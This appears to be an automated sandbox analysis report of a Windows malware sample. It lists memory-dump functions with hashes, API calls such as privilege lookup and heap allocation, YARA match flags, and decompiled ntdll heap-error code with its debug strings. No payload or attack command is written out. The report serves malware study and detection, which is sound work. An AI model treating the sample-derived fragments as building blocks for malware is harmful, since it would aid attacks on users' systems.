Instruction ID: ffd9b9730ea14362cf99aebe08a63fabc6db5635d21f52a71fcc6d10490e82ab
Opcode Fuzzy Hash: 19ed027d810f8afcd1e11302291bcabcefbd4c557cc02b83ad2997a021822ace
Instruction Fuzzy Hash: C0900261282051526546B19984085074456B7E0285791C812A1404D50CC5669896E661

Uniqueness

Uniqueness Score: -1.00%

Function 01509860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0150986A

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 358a96cc5d30bb8d73e62dc50eb277c6e32dc7b915295658ebffceb304c0025b
Instruction ID: dfd0d0ea723d2717d23cdc36291d98f3483dfac13e2c97d81909b7de197e0fc2
Opcode Fuzzy Hash: 358a96cc5d30bb8d73e62dc50eb277c6e32dc7b915295658ebffceb304c0025b
Instruction Fuzzy Hash: 1E90027124101413E112619985087070459B7D0285F91CC12A0414958DD6968992B161

Uniqueness

Uniqueness Score: -1.00%

Function 015098F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 015098FA

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b00755be0a99a945f78676fae375edeb2275f76f54a99f1ee13a2f0a952d67df
Instruction ID: 43b28e934e1bb42832d70d624dadc58ae0e722f47f87fc921ee52445a7aabffd
Opcode Fuzzy Hash: b00755be0a99a945f78676fae375edeb2275f76f54a99f1ee13a2f0a952d67df
Instruction Fuzzy Hash: 7F90026164101502E10271998408616045AB7D0285F91C822A1014955ECA6589D2B171

Uniqueness

Uniqueness Score: -1.00%

Function 01509A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01509A5A

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d7d8e99b174db5eb5074618b469ca0a7464c2a83bb8b2476434b0312ee7ddd09
Instruction ID: 2d70415e55e7eca9edba67a4dfe1f8f1b315f0d95fc9c0a83829b08e872edf7e
Opcode Fuzzy Hash: d7d8e99b174db5eb5074618b469ca0a7464c2a83bb8b2476434b0312ee7ddd09
Instruction Fuzzy Hash: C290026125181042E20165A98C18B070455B7D0347F51C915A0144954CC95588A16561

Uniqueness

Uniqueness Score: -1.00%

Function 01509A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01509A0A

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b4edc9378e58ec21ebe9e90dae509aa0a738d1f5f6a6abe507688aa5a0193f07
Instruction ID: 7e969db69e4b8687d18be46c1080d110b81c1a7d8ec87d49dd275d83914a4fe2
Opcode Fuzzy Hash: b4edc9378e58ec21ebe9e90dae509aa0a738d1f5f6a6abe507688aa5a0193f07
Instruction Fuzzy Hash: E590027124141402E1016199881870B0455B7D0346F51C811A1154955DC665889175B1

Uniqueness

Uniqueness Score: -1.00%

Function 01509A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01509A2A

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 587178f0bf607ab194e58105c1158e703c07dc6ee6cdf1b76e74d86fc1ba75ef
Instruction ID: 4c6b9c74df25e6b77b921af9a97f3ea65bd40ebbf38c07c44c90097ff61ab388
Opcode Fuzzy Hash: 587178f0bf607ab194e58105c1158e703c07dc6ee6cdf1b76e74d86fc1ba75ef
Instruction Fuzzy Hash: 8A90026164101042514171A9C8489064455BBE1255751C921A0988950DC59988A566A5

Uniqueness

Uniqueness Score: -1.00%

Function 01509540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0150954A

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fad31adfc11f50b8a04b9c07ab765f3a606f97d32477025630addb720e174245
Instruction ID: 03c247f2e09854febca60b12aa5033139a385c067e33878a1cb29205d3108d09
Opcode Fuzzy Hash: fad31adfc11f50b8a04b9c07ab765f3a606f97d32477025630addb720e174245
Instruction Fuzzy Hash: 50900265251010031106A59947085070496B7D5395351C821F1005950CD66188A16161

Uniqueness

Uniqueness Score: -1.00%

Function 015095D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 015095DA

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d36d1e9bacf0eec8bf1f7d887352a692e33f0193e3e5e5f20c308792a49d0c6c
Instruction ID: 1f71107d3c3702ef51773504d0d98f779ab69ea874bf97227a8e8dc753ae676e
Opcode Fuzzy Hash: d36d1e9bacf0eec8bf1f7d887352a692e33f0193e3e5e5f20c308792a49d0c6c
Instruction Fuzzy Hash: C99002A124201003510671998418616445AB7E0245B51C821E1004990DC56588D17165

Uniqueness

Uniqueness Score: -1.00%

Function 01509710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0150971A

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2ff2500a09da942b7b72445d15610f129de33f95d7ec64b4ed4bee16a64aab49
Instruction ID: 335e4607b529286f7230faa404974c6bae0008a8e05e9066faa2f7bce2ce8bd8
Opcode Fuzzy Hash: 2ff2500a09da942b7b72445d15610f129de33f95d7ec64b4ed4bee16a64aab49
Instruction Fuzzy Hash: 7B90027124101402E10165D9940C6460455B7E0345F51D811A5014955EC6A588D17171

Uniqueness

Uniqueness Score: -1.00%

Function 01509FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01509FEA

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b043211a0ac1d8d9c9e03a36a20f7b0b674ae03740b291e3ff8d0029a41d6e82
Instruction ID: 51f18d257ad1691e5562d416ed4adaa2792b75d6ad07401c1a91f9b4735ba0ff
Opcode Fuzzy Hash: b043211a0ac1d8d9c9e03a36a20f7b0b674ae03740b291e3ff8d0029a41d6e82
Instruction Fuzzy Hash: A290027135115402E1116199C4087060455B7D1245F51CC11A0814958DC6D588D17162

Uniqueness

Uniqueness Score: -1.00%

Function 01509780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0150978A

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 52e42548df4ee1916b14606534d9ee08b5fec7d8fa49f24ff43ae14e7a8a40eb
Instruction ID: 9b014a2c92cfc491351d94a096b606638696c7c29407848d023fd2bf7d23ac95
Opcode Fuzzy Hash: 52e42548df4ee1916b14606534d9ee08b5fec7d8fa49f24ff43ae14e7a8a40eb
Instruction Fuzzy Hash: 2F90026925301002E1817199940C60A0455B7D1246F91DC15A0005958CC95588A96361

Uniqueness

Uniqueness Score: -1.00%

Function 015097A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 015097AA

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: ab43050e7eea2d23441b102789b5b038c5f223880761aae92405c7fc4c1e5179
Instruction ID: ed1cb9ca3a944e427137d40f01ab93c3a5ef1f43a9719b043927a116b751b0cf
Opcode Fuzzy Hash: ab43050e7eea2d23441b102789b5b038c5f223880761aae92405c7fc4c1e5179
Instruction Fuzzy Hash: 2490026134101003E1417199941C6064455F7E1345F51D811E0404954CD95588966262

Uniqueness

Uniqueness Score: -1.00%

Function 01509660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 0150966A

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c64e6874a8a896588a2814d5a7bc9513c8c79eaf3f4de4ef6f36440f1c28f87
Instruction ID: 1426e0b276b8339e0890a6ea1be2eb07cc74fb90d4ef4385ca3af8c4891e1450
Opcode Fuzzy Hash: 2c64e6874a8a896588a2814d5a7bc9513c8c79eaf3f4de4ef6f36440f1c28f87
Instruction Fuzzy Hash: 0590027124101802E1817199840864A0455B7D1345F91C815A0015A54DCA558A9977E1

Uniqueness

Uniqueness Score: -1.00%

Function 015096E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 015096EA

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 271a51b2909a98b7a4eb847c9eaf693a342d580c017a928379dcd6850e969a19
Instruction ID: 5b89c69e0942989d9ac9635e04f2e981953ee224aec46c60a3061a34ca3a0ce9
Opcode Fuzzy Hash: 271a51b2909a98b7a4eb847c9eaf693a342d580c017a928379dcd6850e969a19
Instruction Fuzzy Hash: F990027124109802E1116199C40874A0455B7D0345F55CC11A4414A58DC6D588D17161

Uniqueness

Uniqueness Score: -1.00%

Function 004088A0, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6

Uniqueness

Uniqueness Score: -1.00%

Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON

Download Yara Rule

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA

Memory Dump Source

Source File: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA

Uniqueness

Uniqueness Score: -1.00%

Function 004184B2, Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 1993d8cf9dd7c4dd4968be55b6b5490524196a4fb02cee288e17b5a2abb96279
Instruction ID: 91404964ff31784608252adf80318dc1f2c76f96e803e73a1cc0f3d2a26d853f
Opcode Fuzzy Hash: 1993d8cf9dd7c4dd4968be55b6b5490524196a4fb02cee288e17b5a2abb96279
Instruction Fuzzy Hash: 5AE0DFB91106816BEB04EE69E9D18EB3394AF813147508B2EEC9987602C138C55A8AB1

Uniqueness

Uniqueness Score: -1.00%

Function 00418618, Relevance: 1.5, APIs: 1, Instructions: 25COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: fbc4f81e329adb2de959d2e052bae6991319eaf2bc7cf1d8e4d19f02917ea8b8
Instruction ID: d9d604f8cae607a9591711b427ac3a6ac22ed8fcb5bd23c4eb935a93135fabd1
Opcode Fuzzy Hash: fbc4f81e329adb2de959d2e052bae6991319eaf2bc7cf1d8e4d19f02917ea8b8
Instruction Fuzzy Hash: 8DE092B5600204ABDB20DF55CC81EDB3768EF85350F148159FA0CA7241CA35E800CBF4

Uniqueness

Uniqueness Score: -1.00%

Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED

Memory Dump Source

Source File: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD

Memory Dump Source

Source File: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4

Uniqueness

Uniqueness Score: -1.00%

Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650

Memory Dump Source

Source File: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528

Memory Dump Source

Source File: 00000005.00000002.297626446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5

Uniqueness

Uniqueness Score: -1.00%

Function 0150967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01509694

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3554548dc1f3ba060c4c263f7086d2ea6ab1c5524137b1bde202d9f1874a347a
Instruction ID: 5bed23394ab46fac1a8b431d647beb0871684172a5a8a75724a0fc3bba547944
Opcode Fuzzy Hash: 3554548dc1f3ba060c4c263f7086d2ea6ab1c5524137b1bde202d9f1874a347a
Instruction Fuzzy Hash: 21B09B719414D5C5E613D7E44A0C71B7D5077D0745F16C551D1060A45F8778C0D1F5B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0157B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON

Download Yara Rule

Strings

If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0157B314
<unknown>, xrefs: 0157B27E, 0157B2D1, 0157B350, 0157B399, 0157B417, 0157B48E
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0157B484
The resource is owned shared by %d threads, xrefs: 0157B37E
*** enter .cxr %p for the context, xrefs: 0157B50D
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0157B53F
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0157B305
The resource is owned exclusively by thread %p, xrefs: 0157B374
*** A stack buffer overrun occurred in %ws:%s, xrefs: 0157B2F3
*** Resource timeout (%p) in %ws:%s, xrefs: 0157B352
*** An Access Violation occurred in %ws:%s, xrefs: 0157B48F
write to, xrefs: 0157B4A6
*** enter .exr %p for the exception record, xrefs: 0157B4F1
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0157B476
an invalid address, %p, xrefs: 0157B4CF
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 0157B39B
*** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0157B2DC
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0157B3D6
Go determine why that thread has not released the critical section., xrefs: 0157B3C5
*** Inpage error in %ws:%s, xrefs: 0157B418
*** then kb to get the faulting stack, xrefs: 0157B51C
The instruction at %p referenced memory at %p., xrefs: 0157B432
The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0157B38F
The instruction at %p tried to %s , xrefs: 0157B4B6
a NULL pointer, xrefs: 0157B4E0
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0157B47D
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0157B323
The critical section is owned by thread %p., xrefs: 0157B3B9
This failed because of error %Ix., xrefs: 0157B446
read from, xrefs: 0157B4AD, 0157B4B2

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 59129b8c3d5cb293e101025738529f6363884b6adf7b3d6a49dcb58d3d3047a0
Instruction ID: bacad45adb6266e45b48365b65c5ebfb9f0d116300e7ccbaabb99c537fb5ca77
Opcode Fuzzy Hash: 59129b8c3d5cb293e101025738529f6363884b6adf7b3d6a49dcb58d3d3047a0
Instruction Fuzzy Hash: 3F813575A10201FFDB255A8AEC96DAF3F36FF96A95F80008AF9052F122E3719441C772

Uniqueness

Uniqueness Score: -1.00%

Function 01581C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E01581C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x14a48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E014CB150();
				} else {
					E014CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x15b589c);
				E014CB150("Heap error detected at %p (heap handle %p)\n",  *0x15b58a0);
				_t27 =  *0x15b5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01581E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E014CB150();
				} else {
					E014CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E014CB150("Error code: %d - %s\n",  *0x15b5898);
				_t113 =  *0x15b58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E014CB150();
					} else {
						E014CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E014CB150("Parameter1: %p\n",  *0x15b58a4);
				}
				_t115 =  *0x15b58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E014CB150();
					} else {
						E014CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E014CB150("Parameter2: %p\n",  *0x15b58a8);
				}
				_t117 =  *0x15b58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E014CB150();
					} else {
						E014CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E014CB150("Parameter3: %p\n",  *0x15b58ac);
				}
				_t119 =  *0x15b58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E014CB150();
					} else {
						E014CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x15b58b4);
					E014CB150("Last known valid blocks: before - %p, after - %p\n",  *0x15b58b0);
				} else {
					_t120 =  *0x15b58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E014CB150();
				} else {
					E014CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E014CB150("Stack trace available at %p\n", 0x15b58c0);
			}

0x01581c10
0x01581c16
0x01581c1e
0x01581c3d
0x01581c3e
0x01581c20
0x01581c35
0x01581c3a
0x01581c44
0x01581c55
0x01581c5a
0x01581c65
0x01581c67
0x00000000
0x01581c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x01581c67
0x01581cdc
0x01581ce5
0x01581d04
0x01581d05
0x01581ce7
0x01581cfc
0x01581d01
0x01581d0b
0x01581d17
0x01581d1f
0x01581d25
0x01581d30
0x01581d4f
0x01581d50
0x01581d32
0x01581d47
0x01581d4c
0x01581d61
0x01581d67
0x01581d68
0x01581d6e
0x01581d79
0x01581d98
0x01581d99
0x01581d7b
0x01581d90
0x01581d95
0x01581daa
0x01581db0
0x01581db1
0x01581db7
0x01581dc2
0x01581de1
0x01581de2
0x01581dc4
0x01581dd9
0x01581dde
0x01581df3
0x01581df9
0x01581dfa
0x01581e00
0x01581e0a
0x01581e13
0x01581e32
0x01581e33
0x01581e15
0x01581e2a
0x01581e2f
0x01581e39
0x01581e4a
0x01581e02
0x01581e02
0x01581e08
0x00000000
0x00000000
0x01581e08
0x01581e5b
0x01581e7a
0x01581e7b
0x01581e5d
0x01581e72
0x01581e77
0x01581e95

Strings

heap_failure_virtual_block_corruption, xrefs: 01581C91
heap_failure_buffer_underrun, xrefs: 01581C9F
Error code: %d - %s, xrefs: 01581D12
heap_failure_lfh_bitmap_mismatch, xrefs: 01581CD7
heap_failure_invalid_argument, xrefs: 01581CAD
HEAP[%wZ]: , xrefs: 01581C30, 01581CF7, 01581D42, 01581D8B, 01581DD4, 01581E25, 01581E6D
Parameter1: %p, xrefs: 01581D5C
Heap error detected at %p (heap handle %p), xrefs: 01581C50
Parameter2: %p, xrefs: 01581DA5
Parameter3: %p, xrefs: 01581DEE
Last known valid blocks: before - %p, after - %p, xrefs: 01581E45
heap_failure_buffer_overrun, xrefs: 01581C98
HEAP: , xrefs: 01581C16, 01581C3D, 01581D04, 01581D4F, 01581D98, 01581DE1, 01581E32, 01581E7A
heap_failure_unknown, xrefs: 01581C75
heap_failure_block_not_busy, xrefs: 01581CA6
heap_failure_multiple_entries_corruption, xrefs: 01581C8A
heap_failure_usage_after_free, xrefs: 01581CBB
heap_failure_generic, xrefs: 01581C7C
heap_failure_freelists_corruption, xrefs: 01581CC9
heap_failure_internal, xrefs: 01581C6E
heap_failure_listentry_corruption, xrefs: 01581CD0
heap_failure_invalid_allocation_type, xrefs: 01581CB4
heap_failure_entry_corruption, xrefs: 01581C83
heap_failure_cross_heap_operation, xrefs: 01581CC2
Stack trace available at %p, xrefs: 01581E86

Memory Dump Source

Source File: 00000005.00000002.298432455.00000000014A0000.00000040.00000001.sdmp, Offset: 014A0000, based on PE: true

Similarity

API ID:
